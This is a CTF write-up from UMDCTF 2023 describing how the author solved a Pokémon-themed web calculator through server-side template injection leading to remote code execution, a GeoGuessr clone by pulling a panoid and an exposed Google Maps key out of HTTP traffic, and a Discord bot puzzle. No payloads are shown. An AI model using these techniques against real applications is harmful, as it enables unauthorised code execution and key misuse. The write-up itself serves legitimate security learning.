Together with members of the Hallios community and CyberSecMaverick, I participated in UMDCTF 2023.
The CTF theme was Pokémon and I really liked its design and style of the website and challenges themselves.
We reached 86th place which is a respectable position for this CTF.
I'll mainly share writeups of challenges I solved that I found interesting.
WEB - pop calc
The challenge provided a link to a web application:
Trying to make valid operations resulted in this HTTP request/response (I deleted some of the request headers only for the writeup):
Performing invalid calculation resulted in an error and reflects the input:
I tried to understand the system behavior, tried various injections (sqli, ssti, etc.), sent fuzzed inputs and tried many different kinds of attacks unsuccessfully.
Trying SSTI:
An SSTI (Server-Side Template Injection) vulnerability is a type of security weakness found in web applications. When a web application uses templates to generate dynamic content, it may allow user input to be included in the template without proper validation or sanitization. This could potentially allow an attacker to inject malicious code into the template, which is then executed on the server-side when the page is rendered.
I didn't find anything interesting (except the internal server error.
I had fallen asleep and I dreamt about sending some input which caused the server returning information about a service called 'pop' 🤷🏻♀️.
I woke up and thought a little bit. I looked at my SSTI payload and noticed that my payload's syntax might be incorrect.
I sent a different payload:
Now I am 100% sure it's an SSTI issue.
I checked Hacktricks for payloads and tips and used an RCE payload to read the flag.
WEB - notsogeo
This challenge generally asks us to cheat on GeoGuessr games.
GeoGuessr is an online geography game that uses Google Street View to place players in random locations worldwide. Players must guess their location by examining the environment for clues and then placing a pin on a world map.
The challenge provides a source code of a version of this game.
Using the source code, we can try to identify a way to guess our coordinates and guess our correct location on the world map.
I entered into the game.
The game source code:
From the challs.json file and other files, it can be understood that those are the locations that will be part of the game.
We have to guess the correct coordinates to get the flag.
The locations consist of 'pano' (id of the location) and coordinates. However, we don't have access to the files.
Going through the HTTP requests, I could not find the coordinates. However, I kept seeing something called "panoid" which sounded like the location ID.
Searching Google "Find coordinates by panoid" results in this Google Street View documentation:
So we got the 'panoid' and have to find the Google Maps key. Searching for the term "key=" results in this:
Constructing the URL we found in the Google Street View documentation by adding the 'panoid' and 'key' values, gives us the coordinates.
Using the coordinates, we select to correct location on the map and get the key :)
MISC - ChungusBot v3
We can find the Discord bot source code in Github.
Reading the source code we can understand that the flag is divided to four parts.
The first part asks to send the URL in the code (which translates to a gif).
The second part of the flag will be revealed after we guess the correct coin random flips.
Third part will be revealed after we send four numbers that will answer the following sentence.
The fourth part will be revealed after sending a file that will contain the text "You like jazz?" and will be 100 or more characters long.
Now we have obtained all the flag parts :)
Happy hacking,
Orel 👒